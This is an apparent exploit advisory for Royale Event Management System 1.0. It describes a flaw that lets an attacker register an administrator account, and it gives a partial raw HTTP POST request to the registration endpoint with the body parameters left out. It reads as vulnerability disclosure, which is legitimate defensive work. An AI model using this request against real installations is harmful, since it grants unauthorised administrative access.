Royale Event Management System 1.0 Privilege Escalation

Royale Event Management System version 1.0 suffers from a privilege escalation vulnerability by allowing an attacker to register an account as an administrator.

MD5 | 35f13a99bc5c2140a4b831ec8158ec5d

# Exploit Title: Royale Event Management System 1.0 - Authentication Bypass
# Date: 25/03/2022
# Exploit Author: Mr Empy
# Software Link:
# Version: 1.0
# Tested on: Linux

Royale Event Management System 1.0 - Authentication Bypass

Royale Event Management System version 1.0 is affected by a vulnerability
that allows an attacker to bypass authentication. Because of the lack of
session validation, the attacker could register a user with administrative
permissions over the application and gain full access to it.

Severity Level:
7.3 (High)

Affected Product:
Royale Event Management System v1.0

Steps to Reproduce:

1. Open a request repeater (like Burp Suite) and send this request:

POST /royal_event/userregister.php HTTP/1.1
Content-Length: 164
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close


Fill in the parameters with the values according to each one of them and
send the request.

Related Posts